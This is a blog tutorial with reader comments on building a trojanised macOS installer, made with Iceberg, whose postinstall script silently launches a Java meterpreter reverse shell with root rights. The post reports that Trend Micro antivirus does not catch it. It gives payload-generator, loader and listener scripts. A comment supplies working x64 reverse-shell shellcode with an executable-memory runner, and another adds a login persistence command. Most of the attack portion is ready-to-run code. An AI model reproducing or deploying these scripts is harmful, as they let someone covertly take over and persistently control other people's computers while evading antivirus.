64bit OSX hacking with Metasploit

In the previous articles I described how to install and run 64bit OSX in KVM (in this example it is Mountain Lion 10.8.2). Now let's focus on a simple exercise: creating an installer with Iceberg that contains a meterpreter payload and gets executed once the package is installed on the host. I have also installed an antivirus for OSX; according to some online reviews a few products boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall set up on the OSX.

There is a previous article describing a very similar approach for an older 32bit 10.6.x OSX here: https://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit

In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing the Java meterpreter payload. Here is a simple shell script to make things easier (run it from the Metasploit directory, since it calls ./msfpayload):

#!/bin/bash
clear
echo "************************************************************"
echo "   Automatic  Java Meterpreter generator - FOR METASPLOIT   "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir -p ShellCode
# R = raw output; for a Java payload the raw output already is the .jar
./msfpayload java/meterpreter/reverse_tcp LHOST="$IP" LPORT="$port" EXITFUNC=thread R > test.jar
mv test.jar ShellCode/
echo "test.jar generated in ShellCode folder..."

So next let's copy test.jar over to the virtualized OSX and load Iceberg. There is a video demonstration at the end that shows the whole process. Setting up Iceberg is very easy; just make sure you have the jar meterpreter file handy and the loader script, which should be as follows:

#!/bin/sh
# Detach the meterpreter JVM from the installer, otherwise the pkg install waits for it to exit
nohup /usr/bin/java -jar /Applications/Utilities/test.jar >/dev/null 2>&1 &
exit 0

I have chosen the application path /Applications/Utilities/ for the jar file to be installed in, and a postupgrade or postinstall script that loads test.jar while the installer runs. Also, while creating the Iceberg installer make sure that "Requires Admin" is checked, otherwise you won't get root privileges. Here are some screenshots:

Once you compile the project, the installer located in /Users/user/Test (or whatever you have called the project) can be executed. I have also created a simple shell script for the Metasploit listener:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  meterpreter listener - FOR METASPLOIT        "
echo "***************************************************************"
echo -e "What IP should the handler bind to? (empty = 0.0.0.0, all interfaces) : \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "      starting the meterpreter listener.."
# The original line read LHOST=$127.0.0.1, which the shell expands as "$1" followed by
# "27.0.0.1", so the handler tried to bind to the wrong address. Ask for it instead.
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST="${IP:-0.0.0.0}" LPORT="$port" E

So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.

So the Java meterpreter payload works well; how about native reverse tcp shell payloads for 64bit OSX? Generated the way shown below, they don't run: the shellcode ends up in the binary's data segment, which 64bit OSX maps writable but not executable (the NX bit, enforced through the kernel's page mappings), so the very first instruction fetch faults. I have tested it here with the following C source generator:

#!/bin/bash
clear
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "    osx/x64/shell_reverse_tcp wrapped into a C source file  "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir -p ShellCode
# -t ruby gives the 'buf = ' / "..." + layout that the sed steps below expect
./msfpayload osx/x64/shell_reverse_tcp LHOST="$IP" LPORT="$port" EXITFUNC=thread R | ./msfencode -e x64/xor -t ruby > test.c
mv test.c ShellCode/
cd ShellCode || exit 1
# Drop the Ruby string-concatenation plus signs at the end of each line
sed -e 's/+/ /g' test.c > clean.c
# Turn the Ruby variable into a C array
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
{
  echo "#include <stdio.h>"
  cat ready.c
  echo ";"
  # micro[] lives in the (non-executable) data segment; jumping into it
  # is what produces the bus error described below
  echo "int main(void) { ((void (*)())micro)();"
  echo "}"
} > final.c
echo "final.c is ready in ShellCode, please compile it using gcc on OSX"
# Cleanup
rm -f clean.c test.c ready.c
cd ..

Once we copy final.c over to OSX we can compile it via GCC and execute it, but all I get is a bus error (SIGBUS): the micro[] array sits in the data segment, and jumping into memory that is not mapped executable is exactly what triggers it.

So with this generator we are stuck with the Java meterpreter payload on 64bit OSX systems. The native payload itself is fine; it only needs to be copied into a page mapped with PROT_EXEC before being called, as the first comment below demonstrates.

Interesting Trend Micro Titanium processes on the OSX:

ps aux | grep Trend
user             280   0.4  1.3   713228  26736   ??  Ss    9:19AM   0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root             364   0.0  2.2   652028  45640   ??  Ss    9:20AM   0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user             196   0.0  0.5   690412  10752   ??  S     9:13AM   0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root              62   0.0  0.2   617688   3472   ??  Ss    9:11AM   0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root              61   0.0  0.2   617520   3912   ??  Ss    9:11AM   0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root              59   0.0  0.2   628928   4128   ??  Ss    9:11AM   0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root             481   0.0  0.0  2433436      0   ??  R     9:41AM   0:00.00 grep Trend

And here is the whole process summary in a short video:


14 Responses to 64bit OSX hacking with Metasploit

  1. anonymous says:

    SIGBUS == Trying to execute non executable memory, you are not even attempting to put the shellcode somewhere executable.

    $ ./msfpayload osx/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 C;
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/mman.h>

    unsigned char buf[] =
    "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f"
    "\x05\x49\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6"
    "\x56\x48\xbe\x00\x02\x11\x5c\x7f\x00\x00\x01\x56\x48\x89\xe6"
    "\x6a\x10\x5a\x0f\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31"
    "\xf6\x0f\x05\xb8\x5a\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31"
    "\xc0\xb8\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52\x57\x48\x89"
    "\xe6\x0f\x05";

    int main(int argc, char **argv)
    {
    /* anonymous RWX page: the shellcode is copied here instead of running from .data */
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) { perror("mmap"); return 1; }
    printf("ret: %p\n", ptr);
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    return 0;
    }

    $ ./sc

    *****
    $ nc -l 127.0.0.1 4444
    id;
    uid=501(user) gid=20(staff)

  2. hello,
    thank you for this awesome post!
    I tried to add persistence simply by adding the following line to the file install.sh:

    defaults write /Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add '{Path="/Applications/Utilities/test.jar";}'

    it works for me: at reboot i get the meterpreter session :-)

    ….

  3. Eli says:

    Is there anyway I could make this on Kali Linux and then use it on a mac?

  4. Aristobulo Gomez says:

    Hi, a newbie question, I just installed osx 10.8.2 to try this and installed iceberg but it doesn't open, it just jumps on the dock but doesn't open any window, could you help me?

  5. Patrick Kantorski says:

    Hey astr0baby! I’m new to using Metasploit, but I’ve learned a lot in the past few days.

    [1] I'm attempting to enter my Mac OS X from my Kali Linux virtual machine using your tutorial. I got creating the files down, but there's a couple of things I'm not sure about. When using the Java Meterpreter script, for the LHOST that goes into creating the test.jar file, would the LHOST be the local host ip of my Mac OS X (to be penetrated) or of Linux (the listener)? I'm trying to understand how the basic concept works. My guess is that creating and executing the file opens Mac OS X to the listener, but I'm not quite sure if this is done by utilizing the LHOST of the target OS X or LHOST of the Listener.

    [2] Also, I know that the default port is 4444 for Metasploit, however, when I run NMAP it seems that this port is closed.. Additionally, this is what I get running it on my Kali IP vs OS X IP.

    From the Ethernet Adapter IP on Kali (10.0.0.11):
    All 1000 scanned ports on 10.0.0.11 are closed

    From the Ethernet Adapter IP on Mac OS X (10.0.0.2):
    Not shown: 987 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    445/tcp open microsoft-ds
    548/tcp open afp
    3580/tcp open nati-svrloc
    5000/tcp open upnp
    5001/tcp open commplex-link
    5002/tcp open rfe
    5900/tcp open vnc
    6881/tcp open bittorrent-tracker
    7000/tcp open afs3-fileserver
    7001/tcp open afs3-callback
    7100/tcp open font-service
    10000/tcp open snet-sensor-mgmt
    MAC Address: XX:XX:XX:XX:XX:XX (Apple)

    I tried turning off the firewall on both sides, but I'm still having trouble finding a working port for 10.0.0.11. How is this port chosen and how can I check that it's open on both sides? Or maybe I don't need to use this particular IP to perform this test at all...? Can I also possibly tunnel through an open port instead if not 4444? Some ports are blocked for the internet in my apartment building and everyone has their own router.

    [3] Lastly, I see that your listener script has the default Kali Linux local IP 127.0.0.1. At the start of initializing msfconsole, I initially get this prompt:

    [-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host “localhost” (::1) and accepting
    TCP/IP connections on port 5432?
    could not connect to server: Connection refused
    Is the server running on host “localhost” (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

    From the Local Loopback IP on Kali (127.0.0.1):
    Not shown: 999 closed ports
    PORT STATE SERVICE
    631/tcp open ipp

    Does this mean that 631 is the only port I can choose? Maybe I have to open more ports to 127.0.0.1..? Not completely sure what to make of it.

    I know that I asked a lot.. Maybe your answer to one of my first questions will fix most of my problems, but I want to learn and understand more about this process. When you have time, a response would be deeply appreciated and I’m sure it will help others in my situation. Thanks again for making the tutorial!
